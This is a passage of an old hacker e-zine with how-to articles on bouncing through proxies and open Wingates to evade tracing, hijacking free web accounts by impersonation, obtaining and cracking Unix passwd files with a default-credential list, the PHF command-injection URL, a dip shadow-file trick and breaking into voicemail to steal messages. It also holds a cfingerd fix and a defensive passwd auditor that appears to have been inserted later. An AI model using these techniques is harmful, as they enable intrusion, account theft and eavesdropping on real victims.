374531a02be81021ca9a12059a3c4515 cfingerd_1.3.2-11.0.diff.gz f8819601f85115c063d5cace970554d6 cfingerd_1.3.2-11.0.dsc 2f943297e0b73fe32345e932f11b6a58 cfingerd_1.3.2-11.0_i386.changes b9df424d723da39aa9c0067171822d56 cfingerd_1.3.2-11.0_i386.deb 4a3403d2519fea6b829bdeda9026c8ad cfingerd_1.3.2-11.0_i386.upload Those of you not using Debian may apply the following diff. --- cfingerd-1.3.2.orig/src/privs.h +++ cfingerd-1.3.2/src/privs.h @@ -29,6 +29,7 @@ #ifndef _USE_BSD #define _USE_BSD 1 #include +#include #undef _USE_BSD #else #include @@ -72,14 +73,20 @@ extern #endif gid_t real_gid, effective_gid; +#ifndef MAIN +extern +#endif +gid_t grouplist[1]; #define RELINQUISH_PRIVS { \ real_uid = getuid(); \ effective_uid = NOBODY_UID; \ real_gid = getgid(); \ effective_gid = NOBODY_GID; \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + grouplist[0] = effective_gid; \ + setgroups(1, grouplist); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define PRIV_ROOT_START {\ 
@@ -87,25 +94,29 @@ setregid(effective_gid, real_gid); \ #define PRIV_ROOT_END \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define USER_PRIVS(a,b) {\ - setreuid(real_uid, 0); \ - setregid(real_gid, 0); \ + setreuid(0, 0); \ + setregid(0, 0); \ effective_uid = (a); \ effective_gid = (b); \ - setregid(real_gid, effective_gid); \ - setreuid(real_uid, effective_uid); \ + grouplist[0] = effective_gid; \ + setgroups(1, grouplist); \ + setregid(effective_gid, effective_gid); \ + setreuid(effective_uid, effective_uid); \ } #define NOBODY_PRIVS \ - setreuid(real_uid, 0); \ - setregid(real_gid, 0); \ + setreuid(0, 0); \ + setregid(0, 0); \ effective_uid = NOBODY_UID; \ effective_gid = NOBODY_GID; \ - setreuid(real_uid, effective_uid); \ - setregid(real_gid, effective_gid); + grouplist[0] = NOBODY_GID; \ + setgroups(1, grouplist); \ + setgid(NOBODY_GID); \ + setuid(NOBODY_UID); #endif /* _PRIVS_H_ */

ADDITIONAL CREDIT goes to Jakob Bohm Jensen. He reported some other things (not these in particular) that didn't turn out to be a hole but led me to examine the code carefully.

John Goerzen   Linux, consulting & programming            jgoerzen@complete.org |
Developer, Debian GNU/Linux (Free powerful OS upgrade)          www.debian.org |
+---------------------------------------------------------------------+
Visit the Air Capital Linux Users Group on the web at: http://www.aclug.org

Conclusion
----------

I hope this article has enlightened you to certain security holes and how to fix them. For further info on security holes, check out www.rootshell.com or www.geek-girl.org/bugtraq.

XFire
crossfire@hackers-uk.freeserve.co.uk

:..::..End Of File..::..:

:..::..File 6 Of 11.::..:
:.:..Bouncing Your IP.:.:
:..::...By Cyborg...::..:

<*> Introduction:

This file deals with bouncing your connection through servers.
It is also meant to clear up some misconceptions about your privacy whilst on the internet.

*** Introduction To Bouncing

We all desire anonymity to a certain extent. Just exploring the internet through your regular account is no fun. Your Internet Protocol (IP) address is your address when online. Whenever you send an e-mail, post to a newsgroup, join an IRC channel or even access a website you are being tracked.

Many people are paranoid about cookies. They are stored on your computer so that websites don't need you to re-enter information. I have also read many people say it is stupid to delete them. That is bullshit. I delete cookies, not because I think the US government are tracking me but because I know that encrypted passwords are often stored in cookies and if anyone could get hold of these then they might be able to gain access to my accounts.

Please do not confuse bouncing with spoofing. IP spoofing is the art of hiding a connection behind packets that seem to come from some arbitrary source. IP bouncing is the art of re-routing your IP through somebody else's open connection. We're not going to be hiding behind packets so there will be logs and records kept on the computer you are bouncing to. Remember that you aren't truly safe unless you are spoofing from a guest account on a laptop connected to an out of country analogue cell phone whilst journeying on a train cross country at rapid speeds. Anything short of that requires caution and obscurity.

The advantages to bouncing are many. Besides hiding your identity when hacking (or attempting to hack) it can also be a benefit to the general public as nuke protection and trojan protection. It is comfortable to know that you are enclosed, but beware, you aren't untouchable.

*** Proxy Server Bouncing

Ok, we know that proxies keep logs, so hacking from one wouldn't be a very smart idea. However what if you went through more than one?

Go to telnet. If you are on Unix type telnet and press enter.
If you are on Windows double-click telnet.exe in the Windows installed directory. Now connect to the proxy, e.g. proxy.compuserve.com, on the port it is operating on. Most proxy machines operate on port 8080 but not always. Then connect yourself through telnet to another proxy, then another and so on.

Now when a distraught victim finds someone has been in their box they'll contact the sysadmin of the proxy requesting logs. Then when they figure out that it's another proxy they will have to contact another sysadmin. Now, many sysadmins aren't willing to e-mail their logs simply because somebody said they were hacked, and many will have deleted their recent logs by the time they are contacted by the victim down the line of sysadmins. Also, use a guest account. If your victim does manage to weave his way through your multiple connection he will eventually hit a dead end. So by now you must be convinced that bouncing is a good idea.

To use a proxy through your web browser, in Netscape, click on Options|Network Preferences then click on the 'Proxies' tab and check the radio button 'Manual Proxy config' and then click the 'view' button. Set it up for whatever protocols you want (some proxies might only support HTTP), probably FTP and HTTP. In Internet Explorer, click View|Options then click on the 'Connection' tab and set it up as with Netscape.

*** Wingate Bouncing

Wingate is a program for Windows which allows you to connect a whole network to the internet, bearing all the net traffic on one computer. In short, it is just another proxy program. However, it is very popular for its use by hackers. Its flaws allow you to bounce to it from the standard telnet port 23. This means you can use all the telnet commands from your connection. Port 23 is open from the basic system preferences. It can be blocked or restricted to password access only, but comes open by default. You can telnet to port 23 on any wingate system. It will then give you the WinGate> prompt.
You can then telnet from there to any other system:

WinGate>proxy.compuserve.com:23

Wingate IPs are very handy to have so I recommend you start scanning for them right away. What a wingate scanner does is open port 23 on a computer and scan for the string WinGate>

That is not the only thing wrong with Wingate. If you are an OP in an IRC channel and you suspect someone is wingating you can crash them off the internet. The bug is pretty straightforward: telnet to the server at its POP3 port and then type in:

USER x#99999.....

Type as many nines as possible; this overflows the buffer and crashes it. It might be important for you to know that all these tricks only work if the sysadmin is too lazy to bother fixing them.

Here are eight steps if you are reading this file to help secure your Wingate:

1 - Open GateKeeper and log into Wingate as Administrator.
2 - Double click on Policies, and double click on "Default Policies".
3 - Select the right "Users can access services".
4 - There will be one recipient there - "Everyone". Double click on this recipient.
5 - Select the Location tab.
6 - Select "Specify locations from where this recipient has rights".
7 - Add 127.0.0.1 and the entries of your main network card.
8 - Hit OK, and remember to save changes.

Now only your LAN users can access any service in Wingate. If some of your services are using their own rules rather than the global ones, you can perform this action for each recipient in those service specific rules.

Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead. If you are interested in hacking, phreaking or programming then e-mail me or visit my website:

cyborg@disinfo.net
http://cyborg.ie.8m.com

:..::..End Of File..::..:

:..::..File 7 Of 11.::..:
:.:.Breaking Accounts.:.:
:..::.:.By HitMan.:.::..:

<*> The main question I would ask about doing this illegal activity is why?
But for the purpose of hacking I will ask no further questions and presume that you are trying to get revenge on the leader of a child porn racket or some other perverse organisation. And if it is for the child porn reason let me know how you get on as I am highly against any type of child porn and the likes.

With this I don't by any means mean just any old type of account, I mean the free one you get just like a Tripod account or Xoom. With that in mind I must tell you that this is a long process in getting access but if you feel it's worth it then by all means go and do it. Did you ever notice that when registering with Tripod they send you a whole heap of shit such as username/password over e-mail. So basically you have to follow a few but still simple steps in doing this.

First find out as much as you can about the target such as their name, current e-mail address, that kind of thing. With that you build up a profile on the target and use this against them. Now create a free e-mail address with Yahoo (or any one you want) using the target's details. For example the target's name is John Divine and he lives at 38 Cowper Downs, Rathmines, Dublin 14, Ireland (made up name and address). Just use this as the data you enter when setting up the account.

Now e-mail the web-master in Tripod and just simply let them know that you (John Divine..........) have now changed your e-mail address to jdivine@yahoo.com (or whatever) and that they should change their records etc.

New username: johndivine
New e-mail address: jdivine@yahoo.com

Now with this, a few months down the road, e-mail them saying that you have forgotten your password. Now they will send you a new password to the given e-mail address (which in this case would be the one you made). This will then in turn give you 100% access to their account. You can just do it as soon as you change the e-mail address but this could fail for two reasons:

A) They will think it's too soon and get a bit suspect of your activities.
B) It will be too soon and the record will not be updated for a couple of days.

/-----------\         /-----------\        /-----------\
|           |         |           |        |           |
|  Account  |---------|  Original |--------| Provider  |
|           |         |  E-mail   |        |           |
|           |         |           |        |           |
\-----------/         \-----------/        \-----------/
      |                                          |
      |              /-----------\               |
      |              |           |               |
      |--------------|    New    |---------------|
                     |  E-mail   |
                     |           |
                     \-----------/

If you have any questions on this feel free to mail me about your problems and I'll be more than happy to answer your questions.

[-=http://hitman.ie.8m.com=-]
[-=vectra500@geocities.com=-]

:..::..End Of File..::..:

:..::..File 8 Of 11.::..:
:.Cracking Passwd Files.:
:..::...By Cyborg...::..:

<*> Introduction:

This file deals with unix passwd files and how to obtain and crack them. It is not meant as an ultimate guide. It deals with many aspects of passwd protection.

*** Starting Off

Most FTP servers have the directory /pub which stores all the 'public' information for you to download. But alongside /pub you will probably find other directories such as /bin and /etc; it's the /etc directory which is important. In this directory there is normally a file called passwd. This looks something like this:

root:7GHgfHgfhG:1127:20:Superuser
jgibson:7fOsTXF2pA1W2:1128:20:Jim,,,,,,,:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mcn:t3e.QVzvUC1T.:1130:20:Greatbear,,,,,,,:/usr/people/mcn:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh

This is where all the user names and passwords are kept. For example, root is the superuser and the rest are normal users on the site. The bit after the word root or mcn, such as in this example (EUyd5XAAtv2dA), is the password, but it is encrypted with the one-way DES encryption standard. So you use a password cracker. I recommend John The Ripper because it is the best. You can easily find that by typing it in at a search engine. Note that a decoy unix passwd file is sometimes stored in /home/ftp/etc/passwd to mislead people.
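From the admin's side, a passwd file in this format can be checked for the weaknesses this file and the dead.letter trick in File 5 turn on. Here is an added example (not the article's code) that audits such a file; the sample entries are constructed on the model of the listing above and the hashes are fake.

```python
"""Audit a passwd(5) file for the problems discussed in this article.

Added example, not the article's own code. It flags entries with an empty
password field (such as the frostiez line the dead.letter trick appends),
extra uid 0 accounts, hashes sitting in passwd itself instead of a shadow
file, and users sharing one hash (same salt and same password). The
sample file is constructed, modelled on the listing above; hashes are fake.
"""
from collections import defaultdict

SAMPLE_PASSWD = """\
root:7GHgfHgfhGabcde:0:0:Superuser:/:/bin/csh
jgibson:7fOsTXF2pA1W2:1128:20:Jim:/usr/people/jgibson:/bin/csh
tvr:EUyd5XAAtv2dA:1129:20:Tovar:/usr/people/tvr:/bin/csh
mouse:EUyd5XAAtv2dA:1131:20:Melissa P.:/usr/people/mouse:/bin/csh
daemon:*:1:1:daemon:/:/bin/sh
bob:x:1200:20:Bob:/home/bob:/bin/sh
frostiez::0:0:Mr Frostiez:/root:/bin/bash
"""

# Password-field values that carry no hash: shadowed (x) or locked (*, !).
NO_HASH = {"x", "*", "!", "!!"}


def parse_passwd(text):
    """Parse passwd lines into dicts; malformed lines are kept and marked."""
    entries = []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        fields = line.split(":")
        entry = {"line": lineno, "name": fields[0], "malformed": False}
        if len(fields) != 7 or not fields[2].isdigit() or not fields[3].isdigit():
            entry["malformed"] = True
        else:
            entry.update(passwd=fields[1], uid=int(fields[2]), gid=int(fields[3]),
                         gecos=fields[4], home=fields[5], shell=fields[6])
        entries.append(entry)
    return entries


def audit(entries):
    """Return the findings as lists of user names keyed by problem."""
    findings = {"malformed": [], "empty_password": [], "extra_uid0": [],
                "unshadowed": [], "shared_hash": []}
    by_hash = defaultdict(list)
    for e in entries:
        if e["malformed"]:
            findings["malformed"].append(e["name"])
            continue
        pw = e["passwd"]
        if pw == "":
            findings["empty_password"].append(e["name"])   # logs in with no password
        elif pw not in NO_HASH:
            findings["unshadowed"].append(e["name"])       # hash readable in passwd
            by_hash[pw].append(e["name"])
        if e["uid"] == 0 and e["name"] != "root":
            findings["extra_uid0"].append(e["name"])       # a second superuser
    findings["shared_hash"] = [names for names in by_hash.values() if len(names) > 1]
    return findings


if __name__ == "__main__":
    for problem, names in audit(parse_passwd(SAMPLE_PASSWD)).items():
        if names:
            print(f"{problem}: {names}")
```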
*** Obtaining The Passwd File

First of all, the file is stored in /etc/passwd so that is where you are going to get it from. To get it you need to be able to login to the system. The most common way of doing this is through FTP. The standard FTP port is 21. So load up your favourite FTP program and connect to the desired server with an anonymous login. Now browse into /etc where the passwd file is stored. Take note that sometimes the passwords are stored in /etc/pwd.db

More often than not the server won't allow anonymous logins or places restrictions on accessing /etc/passwd. In this case try the following backdoors:

root      | root
sys       | sys
sys       | bin
sys       | system
daemon    | daemon
uucp      | uucp
tty       | tty
test      | test
unix      | unix
bin       | bin
adm       | adm
adm       | admin
sysman    | sysman
sysman    | sys
sysadmin  | sysadmin
sysadmin  | sys
sysadmin  | system
sysadmin  | admin
sysadmin  | adm
who       | who
learn     | learn
uuhost    | uuhost
guest     | guest
host      | host
nuucp     | anon
nuucp     | nuucp
rje       | rje
sync      | sync
admin     | admin
games     | games
games     | player
sysop     | sysop
root      | sysop
demo      | demo
sysbin    | sysbin
mountfsys | mountfsys

*** Guide to PHF

The PHF (packet handler function) white pages directory services program distributed with the NCSA httpd, versions 1.5a and earlier, and also included in the Apache distribution prior to version 1.0.5, passes unchecked newline (hex 0a) characters to the Unix shell. The phf phone book script file in the cgi-bin directory can be exploited to give you the password (/etc/passwd) file on Unix systems. To use PHF you enter the following command line into any web browser:

http://www.target.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd

This takes you to the /etc/passwd file of the target computer. If you get a 404 error, file not found, then the domain isn't vulnerable. Sometimes you can be logged trying PHF queries but in most cases the domain doesn't report it.
*** Shadowed Passwords

Shadowed password files are where things start to become a little trickier. This type of passwd file is impossible to crack. The real encrypted passwords are stored in different files on different systems. Here is a made-up example of a normal passwd entry:

root:R0rmc6lx78Vwi5I:0:0:root:/root:/bin/bash

Now here is that entry again, only shadowed:

root:x:0:0:root:/root:/bin/bash

You can find the shadowed passwords in these directories according to their system:

Version                  Path                               Token
<*>-----------------------------------------------------------------<*>
AIX 3                    /etc/security/passwd               !
 " "                     /tcb/auth/files//
A/UX 3.0s                /tcb/files/auth/?/*
BSD4.3-Reno              /etc/master.passwd                 *
ConvexOS 10              /etc/shadpw                        *
ConvexOS 11              /etc/shadow                        *
DG/UX                    /etc/tcb/aa/user/                  *
EP/IX                    /etc/shadow                        x
HP-UX                    /.secure/etc/passwd                *
IRIX 5                   /etc/shadow                        x
Linux 1.1                /etc/shadow                        *
OSF/1                    /etc/passwd[.dir|.pag]             *
SCO Unix #.2.x           /tcb/auth/files//
SunOS4.1+c2              /etc/security/passwd.adjunct       ##username
SunOS 5.0                /etc/shadow
System V Release 4.0     /etc/shadow                        x
System V Release 4.2     /etc/security/* database
Ultrix 4                 /etc/auth[.dir|.pag]               *
UNICOS                   /etc/udb                           *

On some Linux Slackwares you can use dip to exploit root; it can also be used to get the shadow file.

ln -s /etc/shadow /tmp/dummy.dip
/sbin/dip -v /tmp/dummy.dip

If dip is vulnerable this will show the shadow file. There is another alternative, you can unshadow the passwd file with the following famous C source code:

<*>-------------------------< Unshadow.c >--------------------------<*>

#include <stdio.h>
#include <pwd.h>

/* Walk the password database with getpwent(); pw_passwd only holds the
   real hash when the caller is allowed to read the shadow file. */
int main(void)
{
    struct passwd *p;

    while ((p = getpwent()) != NULL)
        printf("%s:%s:%d:%d:%s:%s:%s\n", p->pw_name, p->pw_passwd,
               (int) p->pw_uid, (int) p->pw_gid, p->pw_gecos,
               p->pw_dir, p->pw_shell);
    endpwent();
    return 0;
}

<*>-------------------------< Unshadow.c >--------------------------<*>

Well I hope this has been an informative read. If you would like to e-mail me regarding anything in this file then go ahead.
If you are interested in hacking, phreaking or programming then e-mail me or visit my website:

cyborg@disinfo.net
http://cyborg.ie.8m.com

:..::..End Of File..::..:

:..::..File 9 Of 11.::..:
:...Meridian Mail Tips..:
:..::.:..By CFish.:.::..:

<*> Meridian Mail Tips And Tricks For Quicker Hacking

This is designed for intermediates that haven't really used Meridians before. These apply to Meridians that aren't direct, except for the last piece of information marked "For Directs". Please note that most of this information applies to people living in the UK.

Names
~~~~~

You can often find where most of the extensions are by using names directories. Common numbers to dial for names are ([P] stands for a 2 second pause):

09 [P] 11
09 [P] 14
09 [P] 144
09 [P] 158

Then when it says enter the name, last name followed by first name, enter something like 56637 meaning "Jones" or just a 3 or 4 random digit combo of numbers. If it says more than 1 name was found then press # again; if it then says too many names were found, then refine your search.

Extensions
~~~~~~~~~~

To get at this you dial:

09 or 0* (There might be another one but I dunno)

Then start guessing 3, 4, 5 digit extensions, mainly 4 digit but not always. If it rings then bingo, you hit a valid extension; write it down, others will likely be around that area. Write as many extensions down as possible, about 30, to guarantee getting a box (not necessarily but likely).
Most extensions are normally in common ranges, which are listed in order of how common they are below:

8***
3*** (I don't know why but 3231 seems exceedingly common on all types of Voice Mail Systems)
5***

Getting more than 1 box using compose
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

When you've got one box and pass, you log in and press 75 for compose, now start guessing boxes. If it says mailbox **** or some name then you hit a valid box. This is like 09 and 0* but you need to log in; it is quicker though and you can get hundreds of valid box numbers in minutes. Inside your box you can use 0* and 09, these are sometimes outdials.

Surveillance
~~~~~~~~~~~~

If you find a system of interest, i.e. Nokia Meridian Mail, in which 90% of passwords are default (box number), and you want to listen to their messages, esp. new ones, without it saying "Read" when they check their box (which would make them very suspicious), you can listen to their messages another way. You could of course read then delete but that causes suspicion too.

How to be subtle:

1. Get yourself a box that hasn't been checked for months
2. Change the password (84)
3. Now 81 to log in
4. Go through people's mailboxes and forward all mail to your box number (73) e.g.

   Log in
   It says you have 2 new msgs
   Now type 73
   Type your box number then ##
   Press 5
   Say what box number the msgs you nicked are from, then the message number.
   Press #
   Press 79
   **Now for message 2**
   Press 6 then repeat

5. Logout of other box
6. Log in to your own box
7. You have their messages!!

**To check that it works press 81 then log in to the box you nicked the msgs from and it will say you have 2 new messages still!

Difficulty logging in??
~~~~~~~~~~~~~~~~~~~~~~~

If you have hit a Meridian but you can't log in, then you can probably log in using the following ways:

1. As soon as you dialed the number press 09 (It might slam you to the log in prompt)
2. Call any extension then press ##81.
3. Press ##81.
4. Find the extension that takes you to the log in bit (e.g.
in the Nokia one it was 5555). Likely ones are 1111, 2222, 3333, 4444, 5555, 6666, 7777, 8888, 9999, 0000, 1000, 2000, 3000, 4000, 5000, 6000, 7000, 8000, 9000 or things like 5005 or 6005 and stuff; if necessary scan 999 numbers until you find it.
5. Hand scan the numbers around the Meridian you have got to see if there is a direct. (Scan 50-100 either way)

For Directs
~~~~~~~~~~~

When you call up a direct, e.g. 0800-899-050, it can be just slightly pissing off when you don't know whether the boxes are 3, 4, 5 digits long or whether they start with 5 or 8 or 3. What you can do is guess at a box and try to log in 3 times with a shit password. It may then suspend the account temporarily (48hrs approx). Try this with box 0593 or 0594 (my old boxes) and on the fourth attempt it will boot you from the system automatically in 1 go; this will tell you if you have a valid box.

CFish
http://ukpk.8m.com
cfish999@hotmail.com

:..::..End Of File..::..:

:..::.File 10 Of 11.::..:
:.:..Letters\Feedback.:.:
:..::...By Readers..::..:

<*> This is the part of the e-zine where we respond to e-mails and questions and stuff. This section is meant to add a personal touch to the e-zine. The original mail headers have been left in, as we aren't going to protect people who send us lame messages. Keep those intelligent e-mails flowing in. Everybody likes a bit of encouragement. The e-mails are arranged in the order of the date they were received.

:..::.Coincidence?..::..:
From: Athanasios Oikonomou
To: cyborg@disinfo.net
Subject: OSA

i read your article in one of the e-zines i downloaded. The desktop surveillance program u wrote about, that appears as OSA, seems to be installed by Microsoft Office. if it is a logger, could u tell me where the log file is, so that i can see it, or is the name just a coincidence?

Thanks for your time
Thanos

<*> <*> <*> <*> <*> <*>

The reason Desktop Surveillance appears on the Task List as OSA is done on purpose so that people will confuse it with the Office Setup Application, a small program that is used in setting up MS Office. By doing this there would be less chance of someone interrupting it by closing it on the task list.

:..::..Subscription.::..:

From: Daniela
To: under_p@yahoo.com
Subject: subscribe

Hello, is there any way to subscribe to your e-zine, because I can't DWL it from your site without user name and password.

Have a nice day,
Daniela

<*> <*> <*> <*> <*> <*>

The website is not passworded. It must just be something running on your box that is stopping you. You probably saw the paragraph in the Introduction about our new subscription list. Alternatively you could try downloading from one of the websites in our distributor list.

:.::.Have Some Files.::.:

From: ZxZZT0PZxZ@aol.com
To: under_p@yahoo.com
Subject: LeechFTP

I thought you might like to include this with your d/l's. It's a nice FTP prog. There is a detailed help file included. Upon unzipping it will self install to your program files unless you specify otherwise. I have scanned each file with Norton 5 and found it to be virus free.

T0p

Attachment
Content-Type: application/zip; name=FTP.ZIP
Content-Disposition: inline;
Content-Transfer-Encoding: base64

<*> <*> <*> <*> <*> <*>

Thanks for the gesture but zipped copies of issues are the only downloads on the site. You should build your own website. I'd help but I'm too busy and all. You could then upload this magazine and become a distributor for us.

:.:..Permanent Access.:.:
From: "Squish"
To:
Subject: Permanent Access

No major hacking trick here. Most hackers have a password cracker or can gain access to systems easily enough, but if the victim changes their password frequently, what can you do instead of re-discovering it all the time?

If for instance your school network is like mine, using a login prompt before opening your desktop, it's quite easy.

Logon as your victim with their password.
Load up 'My Computer' and then enter Server13.
Open the 'Users' folder.
Click on 'All Users'
Right click on their account name.
Go to 'Properties'
Click on 'Security'
Click on 'Add'
Click 'Show users'
Click on your own account name.
Select 'Full Control' from the scroll bar below.
Click on 'Add'

That's it. You can access that user's files from your own desktop no matter what. I recommend however, that you delete the administrator's access to their files otherwise he'll cancel your access and we can't have that. After all, outsmarting other people is really what hacking is all about.

Catch ya' later
Skwish1404

E-mail Squish.Nation@Virgin.Net
Website http://Squish.Freeservers.Com (non hacker site)

<*> <*> <*> <*> <*> <*>

We're always happy to receive snippets of useful information. If you could think of more tips and tricks like that then maybe you'd have enough for a file. In which case get back to us and we'd publish it.

:.:.::.EUA Monthly.::.:.:
From: "jastel marrell"
To: under_p@yahoo.com
Subject: zine

greets,

I am archive. I am in the process of currently d/l'ing your zine. Currently I publish the EUA monthly, a zine on the similar topic of h/p. If you want to grab a copy of our zine you can get it off of our site at www.freespeech.org/eua --> follow the links to the zine. We do our pub in pdf format. various writers provide articles to us as well as information from the EUA's own information networks around the world. You can respond here for further information or contact me on irc.xnet.org in #eua.

l8r
archive

Get Your Private, Free Email at http://www.hotmail.com

<*> <*> <*> <*> <*> <*>

After reading EUA and dropping into #eua I came to the conclusion that archive and his group are very intelligible people. EUA monthly will be reviewed in the next issue of Up so look out for that.

:.::.Zed's Dead Baby.::.:
From: -= ZED =-
To: cyborg@disinfo.net
Subject:

Cyborg,

I read an article you wrote for a zine called Up. It was about pirate radio. If you could explain to me in more detail how to actually broadcast the radio station (hook up the radio to an aerial).

Thanks
z

Get Your Private, Free Email at http://www.hotmail.com

<*> <*> <*> <*> <*> <*>

Sorry but the Pirate Radio Series is only meant as a general guide. I've since been asked specific questions by many people but I don't have the time to answer them in detail. The information is available to anyone who can use a search engine. All you need is time and patience.

:..::..End Of File..::..:

:..::.File 11 Of 11.::..:
:.::.:..Disclaimer.:.::.:
:.::.:.By Up Staff.:.::.:

<*> Use this information at your own risk. Neither the staff or contributors of Up, nor the persons providing this e-zine, will assume ANY responsibility for the use, misuse, or abuse of the information provided herein. The previous information is provided for educational purposes ONLY. The information is NOT to be used for illegal purposes. By reading this e-zine you ARE AGREEING to the following terms:

I understand that using this information is illegal. I agree to, and understand that I am responsible for my own actions. If I get into trouble using this information for the wrong reasons, I promise not to place the blame on Up staff, contributors, or anyone that provided this e-zine. I understand that this information is for educational purposes only.

Thanks for reading.

[ASCII art banner: THE END]

:..::..End Of File..::..: